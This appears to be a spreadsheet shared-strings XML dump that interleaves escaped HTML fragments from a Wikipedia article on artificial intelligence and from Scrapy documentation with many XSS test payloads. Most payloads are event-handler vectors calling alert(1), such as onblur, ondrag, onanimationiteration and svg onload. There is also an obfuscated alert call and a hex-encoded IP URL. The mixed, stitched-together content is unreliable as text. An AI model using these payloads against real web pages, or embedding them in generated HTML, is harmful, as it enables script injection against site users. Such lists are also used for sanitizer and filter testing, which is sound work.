    <t>&lt;label onblur=alert(1) tabindex=1 id=x&gt;&lt;/label&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=BBC+News&amp;amp;rft.atitle=Robots+could+demand+legal+rights&amp;amp;rft.date=2006-12-21&amp;amp;rft_id=http%3A%2F%2Fnews.bbc.co.uk%2F2%2Fhi%2Ftechnology%2F6200005.stm&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;optgroup onload=alert(1)&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Machine_translation" title="Machine translation"&gt;Machine translation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;header draggable="true" ondragenter="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;rtc id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;basefont id=x tabindex=1 onfocus=alert(1)&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="//google"&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=image-net.org&amp;amp;rft.atitle=ILSVRC2017&amp;amp;rft_id=http%3A%2F%2Fimage-net.org%2Fchallenges%2FLSVRC%2F2017%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;wbr ondblclick="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;command style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;col onkeydown="alert(1)" contenteditable&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;listing onbeforecopy="alert(1)" contenteditable&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;font onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/font&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ruby draggable="true" ondragend="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;time style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;One main factor that influences the ability for a driver-less automobile to function is mapping. In general, the vehicle would be pre-programmed with a map of the area being driven. This map would include data on the approximations of street light and curb heights in order for the vehicle to be aware of its surroundings. However, Google has been working on an algorithm with the purpose of eliminating the need for pre-programmed maps and instead, creating a device that would be able to adjust to a variety of new surroundings.&lt;sup id="cite_ref-311" class="reference"&gt;&lt;a href="#cite_note-311"&gt;&amp;#91;300&amp;#93; &lt;/a&gt; &lt;/sup&gt; Some self-driving cars are not equipped with steering wheels or brake pedals, so there has also been research focused on creating an algorithm that is capable of maintaining a safe environment for the passengers in the vehicle through awareness of speed and driving conditions.&lt;sup id="cite_ref-312" class="reference"&gt;&lt;a href="#cite_note-312"&gt;&amp;#91;301&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The main military applications of Artificial Intelligence and Machine Learning are to enhance C2, Communications, Sensors, Integration and Interoperability.&lt;sup id="cite_ref-AI_331-0" class="reference"&gt;&lt;a href="#cite_note-AI-331"&gt;&amp;#91;320&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;meter draggable="true" ondragleave="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;col onpointerleave=alert(1)&gt;XSS&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;applet id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;svg oncontextmenu="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;element onmousemove="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Knowledge_Graph" title="Knowledge Graph"&gt;Knowledge Graph &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Definition_of_AI-1"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Definition_of_AI_1-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Definition_of_AI_1-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Definition_of_AI_1-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;tr id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/tr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFThro1993" class="citation book"&gt;Thro, Ellen (1993). &lt;a rel="nofollow" class="external text" href="https://archive.org/details/isbn_9780816026289"&gt;&lt;i&gt;Robotics: The Marriage of Computers and Machines &lt;/i&gt; &lt;/a&gt;. New York: Facts on File. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-8160-2628-9" title="Special:BookSources/978-0-8160-2628-9"&gt;&lt;bdi&gt;978-0-8160-2628-9 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Robotics%3A+The+Marriage+of+Computers+and+Machines&amp;amp;rft.place=New+York&amp;amp;rft.pub=Facts+on+File&amp;amp;rft.date=1993&amp;amp;rft.isbn=978-0-8160-2628-9&amp;amp;rft.aulast=Thro&amp;amp;rft.aufirst=Ellen&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fisbn_9780816026289&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computational_biology" title="Computational biology"&gt;Computational biology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt;   &lt;/div&gt;</t>
  </si>
  <si>
    <t>0x42.0x0000066.0x7.0x93/</t>
  </si>
  <si>
    <t>&lt;summary id=x tabindex=1 onactivate=alert(1)&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Virtual_reality" title="Virtual reality"&gt;Virtual reality &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Cao, Yongcan; Yu, Wenwu; Ren, Wei; Chen, Guanrong (February 2013). "An Overview of Recent Progress in the Study of Distributed Multi-Agent Coordination". &lt;i&gt;IEEE Transactions on Industrial Informatics &lt;/i&gt;. &lt;b&gt;9 &lt;/b&gt; (1): 427–438. &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1207.3231"&gt;1207.3231 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNRC1999"&gt;NRC 1999 &lt;/a&gt;, pp.&amp;#160;214–216 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFGladwell2005" class="citation book"&gt;&lt;a href="/wiki/Malcolm_Gladwell" title="Malcolm Gladwell"&gt;Gladwell, Malcolm &lt;/a&gt; (2005). &lt;a href="/wiki/Blink_(book)" class="mw-redirect" title="Blink (book)"&gt;&lt;i&gt;Blink &lt;/i&gt; &lt;/a&gt;. New York: Little, Brown and Co. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-316-17232-5" title="Special:BookSources/978-0-316-17232-5"&gt;&lt;bdi&gt;978-0-316-17232-5 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Blink&amp;amp;rft.place=New+York&amp;amp;rft.pub=Little%2C+Brown+and+Co.&amp;amp;rft.date=2005&amp;amp;rft.isbn=978-0-316-17232-5&amp;amp;rft.aulast=Gladwell&amp;amp;rft.aufirst=Malcolm&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;content id=x tabindex=1 onactivate=alert(1)&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onbeforecopy="alert(1)" contenteditable&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;shadow ondragover=alert(1) contenteditable&gt;drop here&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;ul onmouseleave="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;fieldset onload=alert(1)&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;big onmouseleave="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onpointerenter=alert(1)&gt;XSS&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;meta id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;i onkeyup="alert(1)" contenteditable&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;nextid id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;pre onpointerup=alert(1)&gt;XSS&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;track onpointerleave=alert(1)&gt;XSS&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;img src=validimage.png onloadstart=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Service_robot" title="Service robot"&gt;Service &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;listing id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;u onmousemove="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;title draggable="true" ondragenter="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="http://www.scmp.com/tech/innovation/article/2098164/robots-are-coming-here-are-some-jobs-wont-exist-10-years"&gt;"Will your job still exist in 10 years when the robots arrive?" &lt;/a&gt;. &lt;i&gt;&lt;a href="/wiki/South_China_Morning_Post" title="South China Morning Post"&gt;South China Morning Post &lt;/a&gt; &lt;/i&gt;. 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 May </t>
  </si>
  <si>
    <t>&lt;body onerror=alert(1) onload=/&gt;</t>
  </si>
  <si>
    <t>&lt;q onbeforepaste="alert(1)" contenteditable&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;var onload=alert(1)&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;&lt;a href="/wiki/Hans_Moravec" title="Hans Moravec"&gt;Moravec, Hans &lt;/a&gt; (1988). &lt;i&gt;Mind Children &lt;/i&gt;. Harvard University Press. p.&amp;#160;15. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Mind+Children&amp;amp;rft.pages=15&amp;amp;rft.pub=Harvard+University+Press&amp;amp;rft.date=1988&amp;amp;rft.aulast=Moravec&amp;amp;rft.aufirst=Hans&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;image onmouseover="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;shadow id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;caption onpointerover=alert(1)&gt;XSS&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div&gt; &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td colspan="2" class="navbox-list navbox-odd" style="width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;multicol id=x tabindex=1 onactivate=alert(1)&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;col oncut="alert(1)" contenteditable&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;dd id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>top[‘al\x65rt’](1)</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Problem_of_other_minds" title="Problem of other minds"&gt;Problem of other minds &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=28" title="Edit section: Logic"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;260–266, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-77"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-77"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Game_theory_and_mechanism_design-215"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Game_theory_and_mechanism_design_215-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;i draggable="true" ondrag="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onblur=alert(1) tabindex=1 id=x&gt;&lt;/blockquote&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>Expert knowledge as &lt;a href="/wiki/Embodied_cognition" title="Embodied cognition"&gt;embodied &lt;/a&gt; intuition:</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn how to configure Scrapy and see all &lt;a class="hoverxref reference internal" data-doc="topics/settings" data-project="scrapy" data-section="topics-settings-ref" data-version="latest" href="topics/settings.html#topics-settings-ref"&gt;&lt;span class="std std-ref"&gt;available settings</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/telnetconsole.html"&gt;Telnet Console&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-87"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-87"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;figcaption oncopy="alert(1)" contenteditable&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onkeyup="alert(1)" contenteditable&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;source draggable="true" ondragenter="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;s id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Deep_recurrent_neural_networks"&gt;Deep recurrent neural networks </t>
  </si>
  <si>
    <t>&lt;var onblur=alert(1) tabindex=1 id=x&gt;&lt;/var&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;blink id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/blink&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Technological singularity </t>
  </si>
  <si>
    <t>&lt;section onmouseout="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCarthyHayes1969"&gt;McCarthy &amp;amp; Hayes 1969 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dir onbeforepaste="alert(1)" contenteditable&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;div class="section" id="getting-help"&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Computer_vision" title="Computer vision"&gt;Computer vision &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;basefont oncontextmenu="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;nobr id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;html onmouseout="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onclick="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;listing ondrop=alert(1) contenteditable&gt;drop here&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Artificial_general_intelligence#Controversies_and_dangers" title="Artificial general intelligence"&gt;Controversies and dangers of artificial general intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;applet onpointerup=alert(1)&gt;XSS&lt;/applet&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-:0-53"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-:0_53-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-:0_53-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;h1 onmouseenter="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI-331"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-AI_331-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-AI_331-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;keygen onbeforepaste="alert(1)" contenteditable&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;hr oncopy="alert(1)" contenteditable&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onclick="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Schoenick, Carissa; Clark, Peter; Tafjord, Oyvind; Turney, Peter; Etzioni, Oren (23 August 2017). "Moving beyond the Turing Test with the Allen AI Science Challenge". &lt;i&gt;Communications of the ACM &lt;/i&gt;. &lt;b&gt;60 &lt;/b&gt; (9): 60–64. &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1604.04315"&gt;1604.04315 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;ul onload=alert(1)&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Research, AI (23 October 2015). &lt;a rel="nofollow" class="external text" href="http://airesearch.com/ai-research-papers/deep-neural-networks-for-acoustic-modeling-in-speech-recognition/"&gt;"Deep Neural Networks for Acoustic Modeling in Speech Recognition" &lt;/a&gt;. &lt;i&gt;airesearch.com &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;23 October </t>
  </si>
  <si>
    <t>&lt;div onpaste="alert(1)" contenteditable&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-324"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-324"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;base onblur=alert(1) tabindex=1 id=x&gt;&lt;/base&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Gregory_Bateson" title="Gregory Bateson"&gt;Gregory Bateson &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;452–644, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_scientific_naming" title="Glossary of scientific naming"&gt;Scientific naming &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;code onpointerup=alert(1)&gt;XSS&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;isindex id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;sup onpointerover=alert(1)&gt;XSS&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;template id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;noscript ondrop=alert(1) contenteditable&gt;drop here&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;var draggable="true" ondragleave="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;audio oncut="alert(1)" contenteditable&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Intuition" title="Intuition"&gt;Intuition &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;source onmouseup="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="References"&gt;References </t>
  </si>
  <si>
    <t>&lt;menuitem onmouseover="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;track ondragover=alert(1) contenteditable&gt;drop here&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/developer-tools.html"&gt;Using your browser’s Developer Tools for scraping&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-276"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-276"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;frame onmousemove="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;head oncontextmenu="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;rt draggable="true" ondragend="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;element id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/element&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;legend onpointerleave=alert(1)&gt;XSS&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;q onmousedown="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;rp id=x tabindex=1 onfocus=alert(1)&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;time id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;pre oncut="alert(1)" contenteditable&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-337"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-337"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFHernandez-OralloDowe2010"&gt;Hernandez-Orallo &amp;amp; Dowe 2010 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/wiki/Sepp_Hochreiter" title="Sepp Hochreiter"&gt;Hochreiter, Sepp &lt;/a&gt;; and &lt;a href="/wiki/J%C3%BCrgen_Schmidhuber" title="Jürgen Schmidhuber"&gt;Schmidhuber, Jürgen &lt;/a&gt;; &lt;i&gt;Long Short-Term Memory &lt;/i&gt;, Neural Computation, 9(8):1735–1780, 1997 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Gordon_S._Brown" title="Gordon S. Brown"&gt;Gordon S. Brown &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-32"&gt;&lt;a href="#Deep_feedforward_neural_networks"&gt;&lt;span class="tocnumber"&gt;6.5.1 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFDyson1998"&gt;Dyson 1998 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onmouseenter="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;meta onmouseleave="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;ins onbeforepaste="alert(1)" contenteditable&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;rp oncontextmenu="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;nobr oncut="alert(1)" contenteditable&gt;test&lt;/nobr&gt;</t>
  </si>
